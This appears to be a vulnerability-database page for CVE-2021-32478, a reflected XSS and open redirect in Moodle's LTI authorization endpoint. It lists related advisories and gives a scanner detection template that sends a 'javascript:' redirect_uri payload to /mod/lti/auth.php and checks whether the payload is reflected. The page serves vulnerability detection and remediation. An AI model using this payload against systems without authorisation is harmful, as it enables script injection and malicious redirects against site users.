| Reporter | Title | Published | Views | Family All 101 |
|---|---|---|---|---|
| The vulnerability in the virtual learning environment Moodle arises from insufficient cleaning of data provided by users at the final authentication stage of LTI. This allows attackers to execute cross-site scripting (XSS) attacks. | 1 Jun 202100:00 | – | bdu_fstec | |
| CVE-2021-32478 | 7 Nov 202521:02 | – | circl | |
| Moodle 输入验证错误漏洞 | 17 May 202100:00 | – | cnnvd | |
| CVE-2021-32478 | 11 Mar 202200:00 | – | cve | |
| CVE-2021-32478 | 11 Mar 202200:00 | – | cvelist | |
| EUVD-2022-1356 | 3 Oct 202520:07 | – | euvd | |
| Moodle reflected XSS | 12 Mar 202200:00 | – | github | |
| CVE-2021-32478 | 11 Mar 202218:15 | – | nvd | |
| Moodle < 3.8.9, 3.9.x < 3.9.7, 3.10.x < 3.10.4 XSS Vulnerability | 6 Jul 202100:00 | – | openvas | |
| Moodle 3.8.x < 3.8.9, 3.9.x < 3.9.7, 3.10.x < 3.10.4 Multiple Vulnerabilities (MSA-21-0012, MSA-21-0018) | 15 Mar 202200:00 | – | openvas |
id: CVE-2021-32478
info:
name: Moodle 3.8-3.10.3 - Reflected XSS & Open Redirect
author: hackergautam
severity: medium
description: |
Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 contain a reflected XSS and open redirect caused by insufficient sanitization of the redirect URI in the LTI authorization endpoint, letting attackers execute scripts or redirect users maliciously, exploit requires crafted URL with malicious redirect URI.
impact: |
Attackers can inject malicious JavaScript or redirect users to malicious sites via insufficient sanitization in the redirect_uri parameter.
remediation: |
Upgrade to Moodle version 3.8.9, 3.9.7, or 3.10.4 or later.
reference:
- https://twitter.com/JacksonHHax/status/1391367064154042377
- https://nvd.nist.gov/vuln/detail/CVE-2021-32478
- https://moodle.org/mod/forum/discuss.php?d=422314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-32478
cwe-id: CWE-79
epss-score: 0.01157
epss-percentile: 0.63227
cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moodle
product: moodle
tags: cve,cve2021,moodle,xss,intrusive,vuln,vkev
http:
- method: GET
path:
- "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{randstr}}'
- '<form action="javascript:alert'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# digest: 4a0a00473045022100fa1fef5382e24625122a061efea6f4594c33478a21295eed5abcc92ee6b24abc022027b30588a68e25906f955c237fb170a7b82530ec4291e4b48504a5d84d2bf501:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation